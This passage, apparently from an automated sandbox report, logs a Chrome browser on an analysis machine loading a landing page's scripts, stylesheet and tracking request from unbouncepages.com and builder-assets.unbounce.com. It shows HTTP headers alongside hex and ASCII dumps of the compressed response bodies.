                                                                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                Cont
                                                                                                                                                                                                                                                                                Data Raw:
                                                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:53.668342113 CEST1236INData Raw: 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 2a 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 0d 0a 53 65 72 76 65
                                                                                                                                                                                                                                                                                Data Ascii: nt-Security-Policy: default-src * data: blob: 'unsafe-inline' 'unsafe-eval'Server: cloudflareCF-RAY: 8d004ea0c96ac3f0-EWRWmo8_`lY\m=G6J7~ %;r??w7Wwtooy
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:53.668381929 CEST622INData Raw: ce 23 0d c9 91 90 bf fe 7a d8 cf 8e df bc 0d d7 dc 48 75 c3 12 3c 9d 0c 20 1f 0c 46 64 30 99 0e c8 20 62 11 99 8c d2 88 e4 e3 3c 88 58 90 a7 93 00 70 4b 55 c9 b5 e1 e5 f2 a3 51 d4 c0 72 97 60 cd cb a5 38 11 69 7a c4 87 1f 4b 32 69 79 4d 1e 5a 58
                                                                                                                                                                                                                                                                                Data Ascii: #zHu< Fd0 b<XpKUQr`8izK2iyMZX@Ti%cP3hFY4Ah80e?g0g#Vzrc7Td uj5^WD7F]/&ec|SKy:c"-:.aw=
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:53.741097927 CEST697OUTGET /_ub/static/ts/e6c35f50fd3355ae56cc4292c3ae66e2e57ced28.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: unbouncepages.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Referer: http://unbouncepages.com/99392004001023/
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                Cookie: ubvs=984ef446-4894-43d3-86b3-f7f03d0fb80e; ubvt=v2%7C984ef446-4894-43d3-86b3-f7f03d0fb80e%7Cc0c7e975-1edd-476a-8c6c-b9c3f18a8012%3Aa%3Asingle%3Asingle; __cf_bm=na6y8zAWEEPd_WLfIs3pLGcfi8Vd1ydOe7voOG5uk04-1728497213-1.0.1.1-EYMXS1taezGgDDe3SggsgK5J86VdxHU_mJBouxY9Uxucl4vkgcCZjQD6GuXseSnmOSL3savSTNGz2ucgc_iq.Q
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:53.883928061 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:06:53 GMT
                                                                                                                                                                                                                                                                                Content-Type: application/javascript
                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                Last-Modified: Wed, 08 May 2024 22:13:34 GMT
                                                                                                                                                                                                                                                                                ETag: W/"a7eeb377929f3b60727095f859013d59"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                x-amz-version-id: y0uC0xE0yu95rDa35ZEYf2K128n3gwGH
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 dd50f5bdd8da1cdd9e698cc2d6f8e828.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: EWR53-C2
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: fq2Li19aI1sielXb8RAfiB_u317QX_UTzMXadUkPLvMfORp2QCwYcw==
                                                                                                                                                                                                                                                                                Age: 13286776
                                                                                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                Expires: Thu, 09 Oct 2025 18:06:53 GMT
                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                CF-RAY: 8d004ea23b28c3f0-EWR
                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                Data Raw: 33 64 64 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 7d 6b 7b db 38 b2 e6 f7 fd 15 12 a7 87 0b 44 30 2d c9 97 38 94 61 1d c7 49 3a ee 49 62 77 ec 74 d2 ad 51 7b 28 0a 92 18 53 a0 42 82 be c4 e4 fe f6 7d 0a 00 49 50 a2 93 f4 9c 39 cf ee 5c 62 0a c4 9d 40 a1 2e 6f 15 b6 9f b4 5b af a2 b8 15 06 3e e3 09 6b 05 7c 16 c5 4b 4f 04 11 6f ad 42 e6 25 ac 95 30 d6 12 b1 e7 5f b3 d8 f9 9c 38 6f 4e 4f 5e be bb 78 e9 88 3b d1 7a b2 fd bf da b3 94 fb 90 1d e1 87 1b 2f 6e 31 fa b0 b3 bf ef 96 a9 4c 25 73 fa 90 8a d9 81 fb 90 88 38 e0 f3 cb e8 f9 bd 60 49 2d 5b cc 44 1a f3 16 77 26 01 77 6a d9 50 ca 59 e2 7b 2b 86 18 f7 a3 29 fb f0 fe f4 24 5a ae 22 ce b8 40 0c 63 9c 93 09 e4 bb 8c 2e 64 b1 a6 6a a7 6c b3 a4 aa 53 35 58 ab 40 55 9a 93 49 c0 bf d5 e3 59 14 23 35 b8 d1 98 08 da 1d 88 43 e6 84 8c cf c5 62 20 3a 1d cc 9d 55 9a 2c 50 7f 6f cf 66 8e bf f0 e2 93 68 ca 8e 05 12 18 0f 8a d1 7e ab eb 3f 58 bf 2a e9 cc e2 68 79 a2 1b 41 6c 24 c6 46 2b ce e7 28 e0 c8 b2 70 9e e7 03 e6 b0 bb 55 14 8b 84 f2 9c 1c ec ee 6c 7e 2c 22 [TRUNCATED]
                                                                                                                                                                                                                                                                                Data Ascii: 3dde}k{8D0-8aI:IbwtQ{(SB}IP9\b@.o[>k|KOoB%0_8oNO^x;z/n1L%s8`I-[Dw&wjPY{+)$Z"@c.djlS5X@UIY#5Cb :U,Pofh~?X*hyAl$F+(pUl~,"ZO^|___\~&uKkzmAHF_xNHf,2/N3?S_D1X
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:53.883949995 CEST1236INData Raw: d0 db 7f da eb 3d db d9 b3 85 03 fd 41 8c 1c e0 6c b7 ff f4 a0 bf b7 b7 b3 df ad 92 fb bb 78 50 cd 7a 77 c0 ab 09 e7 9d 0e 66 23 3e a6 c2 51 3d 40 f0 ab 9c 62 96 93 d8 e3 d3 68 f9 ed 65 32 60 47 dd 01 db da 2a be dd 5b 4f 2c 9c 59 18 45 31 ea ef
                                                                                                                                                                                                                                                                                Data Ascii: =AlxPzwf#>Q=@bhe2`G*[O,YE1??U=7Q<"$B!q`>qx7pM@j@l$d+GGG-kkv,vv#{{\;,__d;:$$1Ir6#hqN;
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:53.883991957 CEST1236INData Raw: bc b2 cb a2 09 e5 b6 2d 97 77 48 79 96 8d c6 64 46 e1 ac c8 b2 87 1c 3b 3c 9a b2 2c 8b c9 94 de 44 c1 b4 d5 6d 53 ca 1c 5f ee 76 f6 65 58 3d ba 91 9c ee 34 0c 29 9d 65 99 7a 98 aa 16 6e 68 80 f0 40 bf b3 6d 34 a3 31 1d f5 b2 9b 51 77 4c 6e 46 3d
                                                                                                                                                                                                                                                                                Data Ascii: -wHydF;<,DmS_veX=4)eznh@m41QwLnF=?xFscnFOK<7L_G{a\K0Y/iGtwj+=Zvm[e-;dkeV.8mA^q#+MsCmx3O2
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:53.884006023 CEST1236INData Raw: 75 96 65 3b 38 47 1e ae d4 70 74 7b 0e aa b7 2a e1 9f 1d 48 d9 aa 25 6d 43 d2 95 85 5d 0f b4 7f f0 81 02 e2 e3 9c f8 b5 4f 5b 72 2a c6 71 50 1c b4 c2 a9 16 b1 62 30 d8 90 3b fe 9d cb 1d bf 3c ea e5 7a 90 3a 52 c4 86 6b ca 7a f3 fb 26 b7 81 f0 17
                                                                                                                                                                                                                                                                                Data Ascii: ue;8Gpt{*H%mC]O[r*qPb0;<z:Rkz&hw](y|}n.*PXPMd:iCL`]og(x0><{\rK'QmR<>Lu&riiiN!K,B&8VY
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:53.884017944 CEST1236INData Raw: b5 6d 98 2c 91 23 f9 25 62 dc 38 6b 85 e1 13 4c c7 45 92 d2 bf 48 dd 70 21 7d 94 6b b5 34 2f 23 a0 93 58 13 35 bd a8 22 12 7c 8b 42 94 dc 62 49 47 9e 47 51 c8 3c ae c8 82 14 7d a2 aa 4f ad b5 05 eb 63 12 c0 d2 36 d5 22 73 73 8f 68 29 c7 29 d1 32
                                                                                                                                                                                                                                                                                Data Ascii: m,#%b8kLEHp!}k4/#X5"|BbIGGQ<}Oc6"ssh))26Vo5^mYk=zQweso\>.*]MtTNVNAVyTrszq\yUYJP?[WN>4Lut)Qoxz6~"_nn#i?Yaw$`a
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:53.884040117 CEST1236INData Raw: 52 38 47 65 e5 dc da e2 85 5a af 30 65 73 8c 89 f5 44 67 2b 12 fb f5 5c 3d 8c 89 d1 dc d7 aa 39 b5 70 88 a0 bf 20 2b 66 33 16 c7 2c b6 08 97 cb 17 f2 3a 8b 98 cd 70 96 15 af 9b de 4a 86 a8 38 87 84 94 bf 2b ab b0 54 24 cd 10 77 44 b4 aa d8 31 11
                                                                                                                                                                                                                                                                                Data Ascii: R8GeZ0esDg+\=9p +f3,:pJ8+T$wD1{JL*ZWRu"o:}MY<Di=9_a]TD`iOFC{lYO+:l -+lcjVl.s][NEAZ
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:53.884052038 CEST1236INData Raw: d0 61 f8 be 91 5e c3 89 62 2d af 31 39 b3 ed e0 a8 07 c6 c4 89 74 d7 7e 15 a6 c9 82 c5 3a 43 ed e0 9e 64 d9 95 b2 f4 48 ee e6 39 6d b0 1f 6d d8 12 a4 fc 68 b1 1b 01 bb 10 7e 19 ee 13 ef d4 e7 f9 80 38 69 77 01 4a 23 69 35 7a 8b 7e 43 00 80 bb 81
                                                                                                                                                                                                                                                                                Data Ascii: a^b-19t~:CdH9mmh~8iwJ#i5z~Ch"WMp\VZuavE0P\TRXY!Hf<Tmw#uY#%RAC<f>`7WQL?u"
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:53.884066105 CEST1236INData Raw: db 0a 06 dd 04 ac 42 d2 be 81 c9 48 4e a2 d2 a5 81 37 0b 11 0c 9c b7 19 ed 93 88 d1 1d 12 30 ba 4b 3c 46 f7 88 cf e8 3e 49 19 7d 4a 12 46 0f 48 c8 e8 33 32 63 b4 d7 ad 44 83 29 6b b6 b8 2e d9 32 8a 83 af 6c fa 5b 90 04 e2 24 4a b9 70 7b a5 19 96
                                                                                                                                                                                                                                                                                Data Ascii: BHN70K<F>I}JFH32cD)k.2l[$Jp{;>6s #6yJ>PQ.dQ316JZqqeo)QtoqK>COe#Dk)xr@e1Y&,+\9M
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:53.884078026 CEST1236INData Raw: 74 07 c0 2f 9d 96 e8 b4 4f ac 4a 9b a6 90 78 c6 1a 75 9d c0 36 43 cf aa ec 45 ee 8f 50 c5 7b 8e ca 17 31 9b c5 16 79 cb d1 73 60 0d 8c 46 d3 38 94 e9 ef 00 27 ce 71 a1 1a 9f c3 77 b9 e6 64 a2 60 f6 ed 63 9e 65 13 b0 4f df f3 ba 31 b8 f8 00 85 3e
                                                                                                                                                                                                                                                                                Data Ascii: t/OJxu6CEP{1ys`F8'qwd`ceO1>N!WPAP^s+/&7KQ4<^Bs\'/ZyKm_m+:F$S7P81y*UkC9&S7JunIA&ttL-wge7F2
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:54.757621050 CEST734OUTPOST /_ub/i HTTP/1.1
                                                                                                                                                                                                                                                                                Host: unbouncepages.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                Content-Length: 1122
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Origin: http://unbouncepages.com
                                                                                                                                                                                                                                                                                Referer: http://unbouncepages.com/99392004001023/
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                Cookie: ubvs=984ef446-4894-43d3-86b3-f7f03d0fb80e; ubvt=v2%7C984ef446-4894-43d3-86b3-f7f03d0fb80e%7Cc0c7e975-1edd-476a-8c6c-b9c3f18a8012%3Aa%3Asingle%3Asingle; __cf_bm=na6y8zAWEEPd_WLfIs3pLGcfi8Vd1ydOe7voOG5uk04-1728497213-1.0.1.1-EYMXS1taezGgDDe3SggsgK5J86VdxHU_mJBouxY9Uxucl4vkgcCZjQD6GuXseSnmOSL3savSTNGz2ucgc_iq.Q
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:54.950143099 CEST492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:06:54 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                Content-Length: 2
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: http://unbouncepages.com
                                                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'
                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                CF-RAY: 8d004ea8b9b6c3f0-EWR
                                                                                                                                                                                                                                                                                Data Raw: 6f 6b
                                                                                                                                                                                                                                                                                Data Ascii: ok


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                2192.168.2.65027013.224.189.30805924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:53.767520905 CEST363OUTGET /published-css/main-ebbfc5e.z.css HTTP/1.1
                                                                                                                                                                                                                                                                                Host: builder-assets.unbounce.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                Referer: http://unbouncepages.com/
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:54.517874002 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: text/css
                                                                                                                                                                                                                                                                                Content-Length: 2944
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                Date: Wed, 18 Sep 2024 22:47:57 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Wed, 18 Sep 2024 21:13:25 GMT
                                                                                                                                                                                                                                                                                ETag: "54bf75d03e588470d1a76cdbd7ab5c1d"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                x-amz-version-id: utZr4xtDVNV4ci6RrOc0u53V1VtRvrrG
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 41f60102fc29156bc5001d6646f75c02.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: zRx-3O5fcZ19CxYH5QpcDcD7xGmcjjbEIpZ4C14RM95fg8Tv1_LO4g==
                                                                                                                                                                                                                                                                                Age: 1797538
                                                                                                                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 08 6f 42 eb 66 00 03 6d 61 69 6e 2e 63 73 73 00 c5 5b e9 92 a3 38 12 fe bf 4f c1 76 c7 46 57 75 80 c7 1c be 70 cc c4 ee ff 7d 82 9d e8 e8 10 48 36 da 92 81 06 b9 ca d5 84 e7 d9 57 12 87 25 24 83 5c 7b f5 44 4c 1b 91 99 ca f3 4b 01 d9 10 bf 2e 48 e9 95 c5 c9 ab 8a 82 3a fd c5 a1 a8 d8 ff 30 22 70 41 d0 11 a4 ef 4d 59 d4 98 e2 22 8f 41 52 17 e4 4c d1 9e a0 03 8d 97 7b 5a 94 ec ff 27 50 1d 71 ee 25 05 a5 c5 29 f6 83 f2 72 85 b6 b2 1d 02 12 44 66 76 78 40 5c 8d 08 4a e9 9c c6 25 80 10 e7 c7 41 77 f6 23 29 2a 88 aa d8 2f 2f 0e e3 c0 d0 f9 bc 5e af 1f de d8 29 4a be 6d 33 6c b0 08 d0 e9 01 29 14 5d 28 a8 10 70 ed 59 70 5e 9e e9 ef f4 bd 44 bf 72 ee 6f ff 07 db c7 2a c4 b1 77 2a 7e 32 c2 f4 5c 7b 38 cf 51 75 73 48 bf 59 5e e4 e8 61 f7 fe 17 04 2f da 88 d5 7f c7 f5 6c da 54 f8 98 51 a3 0b 1f df f0 b6 57 85 08 a0 f8 15 8d ea 68 fd 50 19 75 52 db 50 e8 76 7c 40 d2 a8 30 07 2d 21 ae 4b 02 de e3 84 14 e9 cb a4 dc 56 99 45 7d 4e 4e 78 ce b7 57 99 71 91 81 da 03 17 5c 3b 5f 9b a4 b8 78 35 fe c9 dd dd 06 [TRUNCATED]
                                                                                                                                                                                                                                                                                Data Ascii: oBfmain.css[8OvFWup}H6W%$\{DLK.H:0"pAMY"ARL{Z'Pq%)rDfvx@\J%Aw#)*//^)Jm3l)](pYp^Dro*w*~2\{8QusHY^a/lTQWhPuRPv|@0-!KVE}NNxWq\;_x5r_)S8uOeQQ;\a~y)>{iSS1=)V|M;7o-,D3%8GmBOl.;0>Mo,k/'4FM!}):qUzXdJ&^6%I\fD E^.% }9V9quL=_BBB[`7
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:54.517894030 CEST897INData Raw: dd 2c 70 b3 d0 cd 22 37 5b b9 d9 da 2d 2b e4 a6 05 44 2e d7 ce 6d 6b 05 51 97 a1 05 ca a1 db a6 7d 72 66 f6 e6 ee d0 bd 4a 57 a0 c3 8f 73 41 91 4b 33 97 c2 66 68 36 83 a7 af 2d 97 75 30 28 48 08 6a 3a 10 60 66 12 50 d6 28 ee 7f 74 a4 5e 5d 82 b4
                                                                                                                                                                                                                                                                                Data Ascii: ,p"7[-+D.mkQ}rfJWsAK3fh6-u0(Hj:`fP(t^]?O2k7nNnM"?r_Apwbgt/Hv0wQZT@6K4kYDN<W-'r'?bp`$IY~ab*
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:54.517905951 CEST1236INData Raw: e9 94 5a d8 da 69 b1 b3 d5 62 a7 69 b1 33 6a b1 53 b4 98 cd 95 96 c9 5f da aa c1 28 c7 7a c8 4b 0a a5 8a 2f 4b 4b 55 7c 6b 55 7c 5d 15 df ac 8a af aa e2 5b aa 12 58 ab 12 e8 aa 04 66 55 82 e6 23 c9 ea 87 d6 aa 84 ba 2a a1 59 95 50 55 25 b4 54 25
                                                                                                                                                                                                                                                                                Data Ascii: Zibi3jS_(zK/KKU|kU|][XfU#*YPU%T%V%UDcUYTUfc[[UYUYL?mUll;,l (aWqZi}j}3*w-F@G%!.<vlq%Pq%s1j1Xm
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:54.517920017 CEST184INData Raw: ad 76 14 b9 e3 fc eb 33 9d bf df 33 31 12 fc a2 e5 6c c7 33 42 5d 9d 9d 67 3f c4 b4 a8 ac 54 d8 2d 4d 2a a8 32 26 b4 59 8d bc f9 57 31 c9 0b 8b f4 2c 3c 76 ae 88 57 56 e8 80 2f 4f cf cd b4 87 3a 8f ac 3f 68 dd cd 9a 07 d8 85 61 66 43 ae fd fd 07
                                                                                                                                                                                                                                                                                Data Ascii: v331l3B]g?T-M*2&YW1,<vWV/O:?hafCRb,N@W:eMq,-cGl[=vJNh4}[(Ka,(C[O-gFeG
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:54.517930031 CEST184INData Raw: ad 76 14 b9 e3 fc eb 33 9d bf df 33 31 12 fc a2 e5 6c c7 33 42 5d 9d 9d 67 3f c4 b4 a8 ac 54 d8 2d 4d 2a a8 32 26 b4 59 8d bc f9 57 31 c9 0b 8b f4 2c 3c 76 ae 88 57 56 e8 80 2f 4f cf cd b4 87 3a 8f ac 3f 68 dd cd 9a 07 d8 85 61 66 43 ae fd fd 07
                                                                                                                                                                                                                                                                                Data Ascii: v331l3B]g?T-M*2&YW1,<vWV/O:?hafCRb,N@W:eMq,-cGl[=vJNh4}[(Ka,(C[O-gFeG
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:54.518037081 CEST64INData Raw: 61 95 61 38 b7 6f e9 3b f6 a7 9b 5f ee b2 e0 76 e2 92 c7 92 47 07 28 fe 67 30 ec 95 3d 68 14 de 8d a0 cf 49 71 a2 69 f7 ed 26 8c 9d 60 b9 3c d5 0e ef e6 a0 ba fe e9 5f 91 0e 34 8f 02 3b 00 00
                                                                                                                                                                                                                                                                                Data Ascii: aa8o;_vG(g0=hIqi&`<_4;
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:07:39.520600080 CEST6OUTData Raw: 00
                                                                                                                                                                                                                                                                                Data Ascii:


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                3192.168.2.65027113.224.189.30805924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:54.541557074 CEST353OUTGET /published-js/main.bundle-ef43f79.z.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: builder-assets.unbounce.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Referer: http://unbouncepages.com/
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:55.156323910 CEST688INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/javascript
                                                                                                                                                                                                                                                                                Content-Length: 41618
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                Date: Mon, 09 Sep 2024 20:43:57 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Mon, 09 Sep 2024 20:00:10 GMT
                                                                                                                                                                                                                                                                                ETag: "b5949b3be4687909b13b22dfba27d0ea"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                x-amz-version-id: 36sbtEfRDGy2dcgnPBKNKf28_9VinVuP
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 5a5b94c62ea85e0c0d78b169589b08b4.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: 2LWOt-SiP2Tv_nC8ipggor4uucbrB7xbWQti9fcpLHOQc9AYP6h1AA==
                                                                                                                                                                                                                                                                                Age: 2582579
                                                                                                                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:55.156435013 CEST1236INData Raw: 1f 8b 08 08 c8 53 df 66 00 03 6d 61 69 6e 2e 62 75 6e 64 6c 65 2e 6a 73 00 ec 5b 0b 73 db 46 92 fe 2b 22 f6 4e 05 84 23 88 52 b2 7b 09 68 14 d7 71 9c dd 5c d9 b1 2f 72 2e 55 47 31 2a 90 1c 8a b3 06 31 cc 60 60 59 2b 72 7f fb 7d 3d 0f 0c f8 90 9d
                                                                                                                                                                                                                                                                                Data Ascii: Sfmain.bundle.js[sF+"N#R{hq\/r.UG1*1``Y+r}=rU{uWyAoT3-dWBa;'2Xb5&9="z_KaeYQN]9,</e0$t+U^1ryRTct:QJW:x
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:55.156446934 CEST1236INData Raw: e4 b9 76 78 55 af 89 5b c6 fa ec b2 8c 18 8d 91 aa cd e6 12 eb 29 d4 ad 11 bc 3a 2d 79 75 ab 97 01 5d 61 c0 01 58 a2 5d c5 50 3e 11 43 d9 ef 27 3d 90 2c 0d f4 22 3d 54 39 6c ef 07 6c 9c 66 10 b2 24 19 cb 49 ae f1 d3 e2 2f 4e 70 00 dc 89 3f d2 1d
                                                                                                                                                                                                                                                                                Data Ascii: vxU[):-yu]aX]P>C'=,"=T9llf$I/Np?r">'BUy+7TAp~[}5z!I7*%jdQ3=isG^BCD)py;Ha2K](rw?b>A~)oRTb8?S
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:55.156462908 CEST1236INData Raw: 19 71 aa 53 3e 0f bb d5 23 fa 63 1e d6 c2 47 76 15 19 4f d2 66 6a f8 0e 48 1a 18 bf 8d 45 2e 73 b9 d9 3c 40 64 7e 30 ac a7 a8 e4 4a fc 1d b8 4c ed bc 47 88 78 5f 88 ea ed 33 4a a1 e5 08 6b dc 23 95 77 b6 cb c4 33 57 2e 03 27 2c b1 79 64 76 97 60
                                                                                                                                                                                                                                                                                Data Ascii: qS>#cGvOfjHE.s<@d~0JLGx_3Jk#w3W.',ydv`@-_S]B86{hTA8HHqv{w8Yd FEj'L/9mq{8IA8L*5s66$ENOO-f-gWzc7t4@NHZ
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:55.156538010 CEST1236INData Raw: ab 67 45 cd 63 b2 e1 30 b6 bd 1e 87 b1 85 de d2 c3 e7 24 4d 83 d6 f4 8f 8a 5c 8c 8c 7f b9 9c f4 a9 16 3f 5f 4c 18 bd 3a af 60 4a fd 59 63 16 9a ee b6 4a 32 37 8c 1f a1 c8 77 fa 51 15 4a 03 db d4 e8 f2 49 5e 98 43 8a ca 9e 1f c6 08 04 b3 29 7c d8
                                                                                                                                                                                                                                                                                Data Ascii: gEc0$M\?_L:`JYcJ27wQJI^C)|6HN;jjP/sl*Lao:GADZ5Mb^XM=fk`(l 5,PcU=G[L@$zqY;t0LU^]h;$
                                                                                                                                                                                                                                                                                Oct 9, 2024 20:06:55.156549931 CEST816INData Raw: 51 66 a1 4b d5 72 00 08 d0 1b ae d6 fa d0 40 da 9a 3d 0a 36 5a fe e4 55 3f 0c 4b 77 a3 0f bf 49 b2 d0 d0 e4 b9 2c 48 cc fc 83 23 63 64 2e 0a 04 93 32 42 49 bf ca cc e5 68 32 48 b6 99 7d 26 01 d9 b2 1b e0 5c ad 8a 99 7e ed ed dd 1d ca 7c b2 22 bf
                                                                                                                                                                                                                                                                                Data Ascii: QfKr@=6ZU?KwI,H#cd.2BIh2H}&\~|"b/t/{p7[wk$.P~4S''k>9(OtG]5J]A\79p&o66)g3=2g<!!$%6|#P*0qNFW
